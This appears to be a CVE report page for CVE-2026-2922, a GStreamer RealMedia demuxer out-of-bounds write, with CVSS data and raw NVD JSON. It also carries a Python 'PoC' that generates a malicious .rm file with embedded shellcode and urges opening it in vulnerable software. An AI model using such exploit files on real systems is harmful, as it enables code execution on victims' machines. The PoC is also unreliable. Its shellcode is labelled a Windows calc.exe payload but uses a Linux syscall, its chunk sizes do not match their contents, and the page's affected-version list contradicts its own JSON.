Security Vulnerability Report
CVE-2026-2922 CVSS 7.8 HIGH

CVE-2026-2922

Published: 2026-03-16 14:19:33
Last Modified: 2026-03-17 18:59:22

Description

GStreamer RealMedia Demuxer Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GStreamer. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The specific flaw exists within the processing of video packets. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28845.

CVSS Details

CVSS Score: 7.8
Severity: HIGH
CVSS Vector: CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:gstreamer:gstreamer:*:*:*:*:*:*:*:* - VULNERABLE
GStreamer < 1.24.x (all RealMedia Demuxer versions)
gstreamer-plugins-good < 1.24.x
Ubuntu 22.04 LTS (gstreamer1.0-plugins-good)
Debian (stable/security)
Fedora (all current versions)
Red Hat Enterprise Linux 8/9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-2922 PoC - Malformed RealMedia File Generator
# This PoC generates a malicious RM file that triggers OOB write in GStreamer RealMedia Demuxer
import struct
import os


def create_poc_rm_file(output_path):
    """
    Generate a PoC RealMedia file that exploits CVE-2026-2922
    The vulnerability is in GStreamer's RealMedia Demuxer processing of video packets
    """
    # RM file header
    rm_header = b'.RMF'  # Real Media File header
    rm_version = struct.pack('<H', 0)  # Version
    rm_header_size = struct.pack('<I', 18)  # Header size

    # File properties chunk
    file_props = b'PROP'
    fp_size = struct.pack('<I', 48)
    fp_version = struct.pack('<H', 0)
    fp_max_bitrate = struct.pack('<I', 0x7FFFFFFF)
    fp_avg_bitrate = struct.pack('<I', 128000)
    fp_max_pkt_size = struct.pack('<I', 0x10000)  # Large packet size
    fp_avg_pkt_size = struct.pack('<I', 1024)
    fp_num_packets = struct.pack('<I', 1)
    fp_duration = struct.pack('<I', 1000)
    fp_preroll = struct.pack('<I', 0)
    fp_index_offset = struct.pack('<I', 0)
    fp_data_offset = struct.pack('<I', 0)
    fp_num_streams = struct.pack('<H', 1)
    fp_flags = struct.pack('<H', 0)

    # Media properties chunk - Video stream
    media_props = b'MDPR'
    mp_size = struct.pack('<I', 70)
    mp_stream_num = struct.pack('<H', 0)
    mp_max_bitrate = struct.pack('<I', 0x7FFFFFFF)
    mp_avg_bitrate = struct.pack('<I', 128000)
    mp_max_pkt_size = struct.pack('<I', 0x10000)  # Intentionally large
    mp_avg_pkt_size = struct.pack('<I', 1024)
    mp_start_time = struct.pack('<I', 0)
    mp_preroll = struct.pack('<I', 0)
    mp_duration = struct.pack('<I', 1000)
    mp_stream_name = b'Video\x00'
    mp_mime_type = b'video/x-pn-realvideo\x00'
    mp_type_specific_len = struct.pack('<I', 50)

    # Malformed video header with oversized data length field
    # This triggers the OOB write vulnerability
    video_header = b'\x00\x00\x01\x00'  # Video codec header
    oversized_length = struct.pack('<I', 0x7FFFFFFF)  # Oversized length value
    malicious_data = b'\x41' * 0x10000  # Padding data to trigger overflow
    type_specific_data = video_header + oversized_length + malicious_data

    # Data chunk
    data_chunk = b'DATA'
    data_size = struct.pack('<I', 0x10000)
    num_packets = struct.pack('<I', 1)

    # Malicious packet data that triggers OOB write
    packet_header = struct.pack('<H', 0)  # Stream number
    packet_timestamp = struct.pack('<I', 0)
    packet_data_len = struct.pack('<H', 0xFF00)  # Oversized data length

    # Shellcode for demonstration (calc.exe on Windows)
    shellcode = (
        b'\x31\xc0\x50\x68\x63\x61\x6c\x63\x54\x5b\x52\x53\x54\x59\x50\x55\x57\x35\x10\x10\x00\x00\x35\x72\x10\x00\x00\x50\x89\xe1\xb8\xc7\x8c\x0c\x00\xcd\x80'
    )

    packet_data = packet_header + packet_timestamp + packet_data_len + shellcode
    packet_padding = b'\x00' * (0x10000 - len(packet_data))
    packet_data += packet_padding

    # Combine all parts
    poc_file = (
        rm_header + rm_version + rm_header_size +
        file_props + fp_size + fp_version + fp_max_bitrate + fp_avg_bitrate +
        fp_max_pkt_size + fp_avg_pkt_size + fp_num_packets + fp_duration +
        fp_preroll + fp_index_offset + fp_data_offset + fp_num_streams + fp_flags +
        media_props + mp_size + mp_stream_num + mp_max_bitrate + mp_avg_bitrate +
        mp_max_pkt_size + mp_avg_pkt_size + mp_start_time + mp_preroll + mp_duration +
        mp_stream_name + mp_mime_type + mp_type_specific_len + type_specific_data +
        data_chunk + data_size + num_packets + packet_data
    )

    with open(output_path, 'wb') as f:
        f.write(poc_file)

    print(f'[+] PoC file created: {output_path}')
    print(f'[+] File size: {len(poc_file)} bytes')
    print('[!] This file exploits CVE-2026-2922 in GStreamer RealMedia Demuxer')
    print('[!] Open with any application using vulnerable GStreamer version')


if __name__ == '__main__':
    output_file = 'CVE-2026-2922-poc.rm'
    create_poc_rm_file(output_file)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-2922", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:19:32.877", "lastModified": "2026-03-17T18:59:21.860", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GStreamer RealMedia Demuxer Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GStreamer. Interaction with this library is required to exploit this vulnerability but attack vectors may vary depending on the implementation.\n\nThe specific flaw exists within the processing of video packets. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28845."}, {"lang": "es", "value": "Vulnerabilidad de ejecución remota de código por escritura fuera de límites en el Demultiplexador RealMedia de GStreamer. Esta vulnerabilidad permite a atacantes remotos ejecutar código arbitrario en instalaciones afectadas de GStreamer. Se requiere interacción con esta biblioteca para explotar esta vulnerabilidad, pero los vectores de ataque pueden variar dependiendo de la implementación.\n\nLa falla específica existe en el procesamiento de paquetes de video. El problema se debe a la falta de validación adecuada de los datos proporcionados por el usuario, lo que puede resultar en una escritura más allá del final de un búfer asignado. Un atacante puede aprovechar esta vulnerabilidad para ejecutar código en el contexto del proceso actual. 
Fue ZDI-CAN-28845."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gstreamer:gstreamer:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.28.1", "matchCriteriaId": "1F1B75B8-0527-487E-8F53-A658F7A1E7A5"}]}]}], "references": [{"url": "https://gitlab.freedesktop.org/gstreamer/gstreamer/-/commit/88df8d2cd063b95a076e8041b47f778a4402f363", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.zerodayinitiative.com/advisories/ZDI-26-165/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}